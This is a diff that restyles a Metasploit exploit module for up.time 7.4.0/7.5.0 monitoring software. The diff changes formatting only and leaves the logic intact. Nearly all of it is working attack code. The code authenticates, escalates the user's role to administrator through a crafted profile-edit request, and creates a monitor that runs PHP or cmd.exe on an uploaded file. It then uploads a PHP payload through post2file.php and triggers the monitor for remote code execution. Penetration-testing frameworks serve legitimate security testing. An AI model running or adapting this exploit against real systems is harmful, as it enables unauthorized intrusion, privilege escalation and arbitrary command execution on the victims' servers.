diff --git a/modules/exploits/multi/http/uptime_code_exec.rb b/modules/exploits/multi/http/uptime_code_exec.rb index 5509991a9f..0dd157a310 100644 --- a/modules/exploits/multi/http/uptime_code_exec.rb +++ b/modules/exploits/multi/http/uptime_code_exec.rb @@ -4,510 +4,478 @@ ## require 'msf/core' - class Metasploit4 < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::PhpEXE - - - def initialize(info={}) - super(update_info(info, - 'Name' => "Uptime Version 7.4.0 / 7.5.0 Upload and Exec file", - 'Description' => %q{ - This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0 By - supplying a specially crafted request is possible to upload file and execute arbitrary - commands through privilege escalation. - - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Ewerson Guimaraes(Crash) ', - 'Gjoko Krstic(LiquidWorm) ', - ], - 'References' => - [ - ['CVE', ''], - ['OSVDB', ''], - ['US-CERT-VU', ''] - ], - 'Payload' => - { - 'Space' => 100000, # just a big enough number to fit any PHP payload - 'DisableNops' => true - }, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultOptions' => - { - 'SSL' => false - }, - 'Privileged' => 'True', - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Aug 6 2015' - )) - - register_options( - [ - Opt::RPORT(9999), - OptString.new("USERNAME", [true, 'The username to authenticate as']), - OptString.new("PASSWORD", [true, 'The password to authenticate with']), - ], self.class) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file', + 'Description' => ' + This module exploits a vulnerability found in Uptime + version 7.4.0 and 7.5.0 By supplying a specially + crafted request is possible to upload file and execute + arbitrary commands through privilege escalation. + ', + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ewerson Guimaraes(Crash) ', + 'Gjoko Krstic(LiquidWorm) ' + ], + 'References' => + [ + ['CVE', ''], + ['OSVDB', ''], + ['US-CERT-VU', ''] + ], + 'Payload' => + { + 'Space' => 100_000, + 'DisableNops' => true + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Automatic', {}] + ], + 'DefaultOptions' => + { + 'SSL' => false + }, + 'Privileged' => 'True', + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Aug 6 2015' + )) + register_options( + [ + Opt::RPORT(9999), + OptString.new('USERNAME', [true, 'The username to authenticate as']), + OptString.new('PASSWORD', [true, 'The password to authenticate with']) + ], self.class) end -################################Application Check############################## - def check - sig = "up.time 7.5.0" - sig2 = "up.time 7.4.0" + # ###############################Application Check############################## + def check + sig = 'up.time 7.5.0' + sig2 = 'up.time 7.4.0' - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => '/' + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/') - } ) + print_status("#{rhost}:#{rport} - Checking version...") - print_status("#{rhost}:#{rport} - Checking version...") + if res.code == 200 && res.body =~ /#{sig}/ || res.code == 200 && res.body =~ /#{sig2}/ + return Exploit::CheckCode::Appears + end + Exploit::CheckCode::Safe + end - if res.code == 200 && res.body =~ /#{sig}/ || res.code == 200 && res.body =~ /#{sig2}/ - return Exploit::CheckCode::Appears - end - return Exploit::CheckCode::Safe - end + def exploit + print_status('Trying to login...') + # ############################Application Login########################### + res_auth = send_request_cgi( + 'method' => 'POST', + 'uri' => '/index.php?', + 'vars_post' => { + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + }) - - def exploit - print_status("Trying to login...") -#############################Application Login########################### - res_auth = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/index.php?', - 'vars_post' => { - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'] - - } - } ) - -#############################Check OS ##################################### + # ############################Check OS ##################################### if res_auth.headers['Server'] =~ /Unix/ - print_status("Found Linux instalation - Setting appropriated PATH") - phppath = "/usr/local/uptime/apache/bin/php" - uploadpath = "/usr/local/uptime/GUI/wizards" + print_status('Found Linux instalation - Setting appropriated PATH') + phppath = '/usr/local/uptime/apache/bin/php' + uploadpath = '/usr/local/uptime/GUI/wizards' else - print_status("Found Windows instalation - Setting appropriated PATH") - phppath = "C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe" - uploadpath = "C:\\Program Files\\uptime software\\uptime\\GUI\\wizards" - + print_status('Found Windows instalation - Setting appropriated PATH') + phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe' + uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards' end -########################################################################### + ########################################################################### + if res_auth && res_auth.get_cookies =~ /login=true/ + cookie = Regexp.last_match(1) + cookie_split = res_auth.get_cookies.split(';') + print_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") + print_good('Login success') - if res_auth and res_auth.get_cookies =~ /login=true/ - cookie = $1 - cookie_split = res_auth.get_cookies.split(";") - print_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") - print_good("Login success") + # #####################Privilege escalation getting user ID################# + res_priv = send_request_cgi( + 'method' => 'GET', + 'uri' => '/main.php', + 'vars_get' => + { + 'page' => 'Users', + 'subPage' => 'UserContainer' + }, + 'headers' => + { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + }) + matchdata = res_priv.body.match(/UPTIME.CurrentUser.userId.*/) + get_id = matchdata[0].gsub(/[^\d]/, '') + print_status('Escalating privileges...') + # #####################Privilege escalation post#################################### + res_priv_elev = send_request_cgi( + 'method' => 'POST', + 'uri' => '/main.php', + 'vars_get' => + { + 'section' => 'UserContainer', + 'subsection' => 'edit', + 'id' => "#{get_id}" + }, + 'headers' => + { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + }, + 'vars_post' => + { + 'operation' => 'submit', + 'disableEditOfUsernameRoleGroup' => 'false', + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'passwordConfirm' => datastore['PASSWORD'], + 'firstname' => rand_text_alpha(10), + 'lastname' => rand_text_alpha(10), + 'location' => '', + 'emailaddress' => '', + 'emailtimeperiodid' => '1', + 'phonenumber' => '', + 'phonenumbertimeperiodid' => '1', + 'windowshost' => '', + 'windowsworkgroup' => '', + 'windowspopuptimeperiodid' => '1', + 'landingpage' => 'MyPortal', + 'isonvacation' => '0', + 'receivealerts' => '0', + 'activexgraphs' => '0', + 'newuser' => 'on', + 'newuser' => '1', + 'userroleid' => '1', + 'usergroupid[]' => '1' + }) + # #################################Refresing perms.################################################################### + print_status('Refresing perms...') + res_priv = send_request_cgi( + 'method' => 'GET', + 'uri' => '/index.php?loggedout', + 'headers' => + { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/index.php", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + } + ) -######################Privilege escalation getting user ID################# - res_priv = send_request_cgi({ - 'method' => 'GET', - 'uri' => '/main.php', - 'vars_get' => { - 'page' => 'Users', - 'subPage' => 'UserContainer' - }, - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', - } + res_auth = send_request_cgi( + 'method' => 'POST', + 'uri' => '/index.php', + 'vars_post' => + { + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] - } - ) - matchdata=res_priv.body.match(/UPTIME.CurrentUser.userId.*/) + }) + if res_auth && res_auth.get_cookies =~ /login=true/ + cookie = Regexp.last_match(1) + cookie_split = res_auth.get_cookies.split(';') + print_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") + print_good('Priv. Escalation success') + end - get_id= matchdata[0].gsub(/[^\d]/, '') + # #########CREATING EXEC Service################################################# + phpfile_name = rand_text_alpha(10) + # #########CREATING Linux EXEC Service################################################# + if res_auth.headers['Server'] =~ /Unix/ + print_status('Creating Linux Monitor Code exec...') + res_service = send_request_cgi( + 'method' => 'POST', + 'uri' => '/main.php', + 'headers' => + { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/index.php", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + }, + 'vars_get' => + { + 'section' => 'ERDCInstance', + 'subsection' => 'add' + }, + 'vars_post' => + { + 'initialERDCId' => '20', + 'target' => '1', + 'targetType' => 'systemList', + 'systemList' => '1', + 'serviceGroupList' => '-10', + 'initialMode' => 'standard', + 'erdcName' => 'Exploit', + 'erdcInitialName' => '', + 'erdcDescription' => 'Exploit', + 'hostButton' => 'system', + 'erdc_id' => '20', + 'forceReload' => '0', + 'operation' => 'standard', + 'erdc_instance_id' => '', + 'label_[184]' => 'Script Name', + 'value_[184]' => phppath, + 'id_[184]' => 'process', + 'name_[process]' => '184', + 'units_[184]' => '', + 'guiBasic_[184]' => '1', + 'inputType_[184]' => 'GUIString', + 'screenOrder_[184]' => '1', + 'parmType_[184]' => '1', + 'label_[185]' => 'Arguments', + 'value_[185]' => uploadpath + '/' + phpfile_name + '.txt', + 'id_[185]' => 'args', + 'name_[args]' => '185', + 'units_[185]' => '', + 'guiBasic_[185]' => '1', + 'inputType_[185]' => 'GUIString', + 'screenOrder_[185]' => '2', + 'parmType_[185]' => '1', + 'label_[187]' => 'Output', + 'can_retain_[187]' => 'false', + 'comparisonWarn_[187]' => '-1', + 'comparison_[187]' => '-1', + 'id_[187]' => 'value_critical_output', + 'name_[output]' => '187', + 'units_[187]' => '', + 'guiBasic_[187]' => '1', + 'inputType_[187]' => 'GUIString', + 'screenOrder_[187]' => '4', + 'parmType_[187]' => '2', + 'label_[189]' => 'Response time', + 'can_retain_[189]' => 'false', + 'comparisonWarn_[189]' => '-1', + 'comparison_[189]' => '-1', + 'id_[189]' => 'value_critical_timer', + 'name_[timer]' => '189', + 'units_[189]' => 'ms', + 'guiBasic_[189]' => '0', + 'inputType_[189]' => 'GUIInteger', + 'screenOrder_[189]' => '6', + 'parmType_[189]' => '2', + 'timing_[erdc_instance_monitored]' => '1', + 'timing_[timeout]' => '60', + 'timing_[check_interval]' => '10', + 'timing_[recheck_interval]' => '1', + 'timing_[max_rechecks]' => '3', + 'alerting_[notification]' => '1', + 'alerting_[alert_interval]' => '120', + 'alerting_[alert_on_critical]' => '1', + 'alerting_[alert_on_warning]' => '1', + 'alerting_[alert_on_recovery]' => '1', + 'alerting_[alert_on_unknown]' => '1', + 'time_period_id' => '1', + 'pageFinish' => 'Finish', + 'pageContinue' => 'Continue...', + 'isWizard' => '1', + 'wizardPage' => '2', + 'wizardNumPages' => '2', + 'wizardTask' => 'pageFinish', + 'visitedPage[1]' => '1', + 'visitedPage[2]' => '1' + }) - print_status("Escalating privileges...") - -######################Privilege escalation post#################################### - res_priv_elev = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/main.php', - 'vars_get' => { - 'section' => 'UserContainer', - 'subsection' => 'edit', - 'id' => "#{get_id}" - }, - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', - }, - 'vars_post' => { - 'operation' =>'submit', - 'disableEditOfUsernameRoleGroup' =>'false', - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'], - 'passwordConfirm' => datastore['PASSWORD'], - 'firstname' => rand_text_alpha(10), - 'lastname' => rand_text_alpha(10), - 'location' =>'', - 'emailaddress' =>'', - 'emailtimeperiodid' =>'1', - 'phonenumber' =>'', - 'phonenumbertimeperiodid' =>'1', - 'windowshost' =>'', - 'windowsworkgroup' =>'', - 'windowspopuptimeperiodid' =>'1', - 'landingpage' =>'MyPortal', - 'isonvacation' =>'0', - 'receivealerts' =>'0', - 'activexgraphs' =>'0', - 'newuser' =>'on', - 'newuser' =>'1', - 'userroleid' =>'1', - 'usergroupid[]' =>'1' - } - } ) - -##################################Refresing perms.################################################################### - print_status("Refresing perms...") - res_priv = send_request_cgi({ - 'method' => 'GET', - 'uri' => '/index.php?loggedout', - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/index.php", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' - } - - } ) - - res_auth = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/index.php', - 'vars_post' => { - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'] - - } - } ) - - if res_auth and res_auth.get_cookies =~ /login=true/ - cookie = $1 - cookie_split = res_auth.get_cookies.split(";") - print_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") - print_good("Priv. Escalation success") - end - -##########CREATING EXEC Service################################################# -phpfile_name = rand_text_alpha(10) -##########CREATING Linux EXEC Service################################################# - if res_auth.headers['Server'] =~ /Unix/ - print_status("Creating Linux Monitor Code exec...") - res_service = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/main.php', - 'headers' =>{ - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/index.php", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' - }, - 'vars_get' => { - 'section' => 'ERDCInstance', - 'subsection' => 'add' - - }, - 'vars_post' => { - 'initialERDCId' => '20', - 'target' => '1', - 'targetType' => 'systemList', - 'systemList' => '1', - 'serviceGroupList' => '-10', - 'initialMode' => 'standard', - 'erdcName' => 'Exploit', - 'erdcInitialName' => '', - 'erdcDescription' => 'Exploit', - 'hostButton' => 'system', - 'erdc_id' => '20', - 'forceReload' => '0', - 'operation' => 'standard', - 'erdc_instance_id' => '', - 'label_[184]' => 'Script Name', - 'value_[184]' => phppath, - 'id_[184]' => 'process', - 'name_[process]' => '184', - 'units_[184]' => '', - 'guiBasic_[184]' => '1', - 'inputType_[184]' => 'GUIString', - 'screenOrder_[184]' => '1', - 'parmType_[184]' => '1', - 'label_[185]' => 'Arguments', - 'value_[185]' => uploadpath +'/'+ phpfile_name +'.txt', - 'id_[185]' => 'args', - 'name_[args]' => '185', - 'units_[185]' => '', - 'guiBasic_[185]' => '1', - 'inputType_[185]' => 'GUIString', - 'screenOrder_[185]' => '2', - 'parmType_[185]' => '1', - 'label_[187]' => 'Output', - 'can_retain_[187]' => 'false', - 'comparisonWarn_[187]' => '-1', - 'comparison_[187]' => '-1', - 'id_[187]' => 'value_critical_output', - 'name_[output]' => '187', - 'units_[187]' => '', - 'guiBasic_[187]' => '1', - 'inputType_[187]' => 'GUIString', - 'screenOrder_[187]' => '4', - 'parmType_[187]' => '2', - 'label_[189]' => 'Response time', - 'can_retain_[189]' => 'false', - 'comparisonWarn_[189]' => '-1', - 'comparison_[189]' => '-1', - 'id_[189]' => 'value_critical_timer', - 'name_[timer]' => '189', - 'units_[189]' => 'ms', - 'guiBasic_[189]' => '0', - 'inputType_[189]' => 'GUIInteger', - 'screenOrder_[189]' => '6', - 'parmType_[189]' => '2', - 'timing_[erdc_instance_monitored]' => '1', - 'timing_[timeout]' => '60', - 'timing_[check_interval]' => '10', - 'timing_[recheck_interval]' => '1', - 'timing_[max_rechecks]' => '3', - 'alerting_[notification]' => '1', - 'alerting_[alert_interval]' => '120', - 'alerting_[alert_on_critical]' => '1', - 'alerting_[alert_on_warning]' => '1', - 'alerting_[alert_on_recovery]' => '1', - 'alerting_[alert_on_unknown]' => '1', - 'time_period_id' => '1', - 'pageFinish' => 'Finish', - 'pageContinue' => 'Continue...', - 'isWizard' => '1', - 'wizardPage' => '2', - 'wizardNumPages' => '2', - 'wizardTask' => 'pageFinish', - 'visitedPage[1]' => '1', - 'visitedPage[2]' => '1' - - } - } ) - - else -##########CREATING Windows EXEC Service################################################# - print_status("Creating Windows Monitor Code exec...") - res_service = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/main.php', - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/index.php", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' - }, - 'vars_get' => { - 'section' => 'ERDCInstance', - 'subsection' => 'add' - }, - 'vars_post' => { - 'initialERDCId' => '20', - 'target' => '1', - 'targetType' => 'systemList', - 'systemList' => '1', - 'serviceGroupList' => '-10', - 'initialMode' => 'standard', - 'erdcName' => 'Exploit', - 'erdcInitialName' => '', - 'erdcDescription' => 'Exploit', - 'hostButton' => 'system', - 'erdc_id' => '20', - 'forceReload' => '0', - 'operation' => 'standard', - 'erdc_instance_id' => '', - 'label_[184]' => 'Script Name', - 'value_[184]' => 'c:\windows\system32\cmd.exe', - 'id_[184]' => 'process', - 'name_[process]' => '184', - 'units_[184]' => '', - 'guiBasic_[184]' => '1', - 'inputType_[184]' => 'GUIString', - 'screenOrder_[184]' => '1', - 'parmType_[184]' => '1', - 'label_[185]' => 'Arguments', - 'value_[185]' => "/K \"\"#{phppath}\""+" "+"\"#{uploadpath}\\#{phpfile_name}.txt""\"\" ", - 'id_[185]' => 'args', - 'name_[args]' => '185', - 'units_[185]' => '', - 'guiBasic_[185]' => '1', - 'inputType_[185]' => 'GUIString', - 'screenOrder_[185]' => '2', - 'parmType_[185]' => '1', - 'label_[187]' => 'Output', - 'can_retain_[187]' => 'false', - 'comparisonWarn_[187]' => '-1', - 'comparison_[187]' => '-1', - 'id_[187]' => 'value_critical_output', - 'name_[output]' => '187', - 'units_[187]' => '', - 'guiBasic_[187]' => '1', - 'inputType_[187]' => 'GUIString', - 'screenOrder_[187]' => '4', - 'parmType_[187]' => '2', - 'label_[189]' => 'Response time', - 'can_retain_[189]' => 'false', - 'comparisonWarn_[189]' => '-1', - 'comparison_[189]' => '-1', - 'id_[189]' => 'value_critical_timer', - 'name_[timer]' => '189', - 'units_[189]' => 'ms', - 'guiBasic_[189]' => '0', - 'inputType_[189]' => 'GUIInteger', - 'screenOrder_[189]' => '6', - 'parmType_[189]' => '2', - 'timing_[erdc_instance_monitored]' => '1', - 'timing_[timeout]' => '60', - 'timing_[check_interval]' => '10', - 'timing_[recheck_interval]' => '1', - 'timing_[max_rechecks]' => '3', - 'alerting_[notification]' => '1', - 'alerting_[alert_interval]' => '120', - 'alerting_[alert_on_critical]' => '1', - 'alerting_[alert_on_warning]' => '1', - 'alerting_[alert_on_recovery]' => '1', - 'alerting_[alert_on_unknown]' => '1', - 'time_period_id' => '1', - 'pageFinish' => 'Finish', - 'pageContinue' => 'Continue...', - 'isWizard' => '1', - 'wizardPage' => '2', - 'wizardNumPages' => '2', - 'wizardTask' => 'pageFinish', - 'visitedPage[1]' => '1', - 'visitedPage[2]' => '1' - } - } ) - end - - -########Upload file############################################### - print_status("Uploading file...") - res_upload = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/wizards/post2file.php', - 'vars_post' => { - 'file_name' => phpfile_name + '.txt', - 'script' => payload.encoded - - } - } ) - - print_status("Cheking Uploaded file...") - res_up_check = send_request_cgi({ - 'method' => 'GET', - 'uri' => '/wizards'+ '/' + phpfile_name + '.txt', - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/index.php", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' - } - - } ) - - if res_up_check.code == 200 - print_good("File found: #{phpfile_name}") - else - print_error("File not found") - end - - -#####Get Monitor ID################################################################## - - print_status("Fetching Monitor ID...") - res_mon_id = send_request_cgi({ - 'method' => 'GET', - 'uri' => '/ajax/jsonQuery.php', - 'vars_get' => { - 'query' => 'GET_SERVICE_PAGE_ERDC_LIST', - 'iDisplayStart' => '0', - 'iDisplayLength' => '10', - 'sSearch' => 'Exploit' - }, - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', + else + # #########CREATING Windows EXEC Service################################################# + print_status('Creating Windows Monitor Code exec...') + res_service = send_request_cgi('method' => 'POST', + 'uri' => '/main.php', + 'headers' => { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', 'Connection' => 'keep-alive', 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'Host' => "#{rhost}", 'Referer' => "#{rhost}/index.php", 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' - } + }, + 'vars_get' => { + 'section' => 'ERDCInstance', + 'subsection' => 'add' + }, + 'vars_post' => { + 'initialERDCId' => '20', + 'target' => '1', + 'targetType' => 'systemList', + 'systemList' => '1', + 'serviceGroupList' => '-10', + 'initialMode' => 'standard', + 'erdcName' => 'Exploit', + 'erdcInitialName' => '', + 'erdcDescription' => 'Exploit', + 'hostButton' => 'system', + 'erdc_id' => '20', + 'forceReload' => '0', + 'operation' => 'standard', + 'erdc_instance_id' => '', + 'label_[184]' => 'Script Name', + 'value_[184]' => 'c:\windows\system32\cmd.exe', + 'id_[184]' => 'process', + 'name_[process]' => '184', + 'units_[184]' => '', + 'guiBasic_[184]' => '1', + 'inputType_[184]' => 'GUIString', + 'screenOrder_[184]' => '1', + 'parmType_[184]' => '1', + 'label_[185]' => 'Arguments', + 'value_[185]' => "/K \"\"#{phppath}\"" + ' ' + "\"#{uploadpath}\\#{phpfile_name}.txt""\"\" ", + 'id_[185]' => 'args', + 'name_[args]' => '185', + 'units_[185]' => '', + 'guiBasic_[185]' => '1', + 'inputType_[185]' => 'GUIString', + 'screenOrder_[185]' => '2', + 'parmType_[185]' => '1', + 'label_[187]' => 'Output', + 'can_retain_[187]' => 'false', + 'comparisonWarn_[187]' => '-1', + 'comparison_[187]' => '-1', + 'id_[187]' => 'value_critical_output', + 'name_[output]' => '187', + 'units_[187]' => '', + 'guiBasic_[187]' => '1', + 'inputType_[187]' => 'GUIString', + 'screenOrder_[187]' => '4', + 'parmType_[187]' => '2', + 'label_[189]' => 'Response time', + 'can_retain_[189]' => 'false', + 'comparisonWarn_[189]' => '-1', + 'comparison_[189]' => '-1', + 'id_[189]' => 'value_critical_timer', + 'name_[timer]' => '189', + 'units_[189]' => 'ms', + 'guiBasic_[189]' => '0', + 'inputType_[189]' => 'GUIInteger', + 'screenOrder_[189]' => '6', + 'parmType_[189]' => '2', + 'timing_[erdc_instance_monitored]' => '1', + 'timing_[timeout]' => '60', + 'timing_[check_interval]' => '10', + 'timing_[recheck_interval]' => '1', + 'timing_[max_rechecks]' => '3', + 'alerting_[notification]' => '1', + 'alerting_[alert_interval]' => '120', + 'alerting_[alert_on_critical]' => '1', + 'alerting_[alert_on_warning]' => '1', + 'alerting_[alert_on_recovery]' => '1', + 'alerting_[alert_on_unknown]' => '1', + 'time_period_id' => '1', + 'pageFinish' => 'Finish', + 'pageContinue' => 'Continue...', + 'isWizard' => '1', + 'wizardPage' => '2', + 'wizardNumPages' => '2', + 'wizardTask' => 'pageFinish', + 'visitedPage[1]' => '1', + 'visitedPage[2]' => '1' + }) + end + # #######Upload file############################################### + print_status('Uploading file...') + res_upload = send_request_cgi('method' => 'POST', + 'uri' => '/wizards/post2file.php', + 'vars_post' => { + 'file_name' => phpfile_name + '.txt', + 'script' => payload.encoded + }) - } ) + print_status('Cheking Uploaded file...') + res_up_check = send_request_cgi('method' => 'GET', + 'uri' => '/wizards' + '/' + phpfile_name + '.txt', + 'headers' => { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/index.php", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + }) - matchdata=res_mon_id.body.match(/id=?[^>]*>/) + if res_up_check.code == 200 + print_good("File found: #{phpfile_name}") + else + print_error('File not found') + end - mon_get_id= matchdata[0].gsub(/[^\d]/, '') - print_good("Monitor id aquired:#{mon_get_id}") -####Executing monitor#################################################################### - res_exec_mon = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/main.php', - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/index.php", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' - }, - 'vars_post' => { - 'section' => 'RunERDCInstance', - 'subsection' => 'view', - 'id' => mon_get_id, - 'name' => 'Exploit' + # ####Get Monitor ID################################################################## - } - } ) -###################################################################################### + print_status('Fetching Monitor ID...') + res_mon_id = send_request_cgi('method' => 'GET', + 'uri' => '/ajax/jsonQuery.php', + 'vars_get' => { + 'query' => 'GET_SERVICE_PAGE_ERDC_LIST', + 'iDisplayStart' => '0', + 'iDisplayLength' => '10', + 'sSearch' => 'Exploit' + }, + 'headers' => { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/index.php", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + }) + + matchdata = res_mon_id.body.match(/id=?[^>]*>/) + + mon_get_id = matchdata[0].gsub(/[^\d]/, '') + print_good("Monitor id aquired:#{mon_get_id}") + # ###Executing monitor#################################################################### + res_exec_mon = send_request_cgi('method' => 'POST', + 'uri' => '/main.php', + 'headers' => { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/index.php", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + }, + 'vars_post' => { + 'section' => 'RunERDCInstance', + 'subsection' => 'view', + 'id' => mon_get_id, + 'name' => 'Exploit' + + }) + ###################################################################################### else - print_error("#{rhost}:#{rport} - Cookie not found") - return nil + print_error("#{rhost}:#{rport} - Cookie not found") + return nil end - -end + end end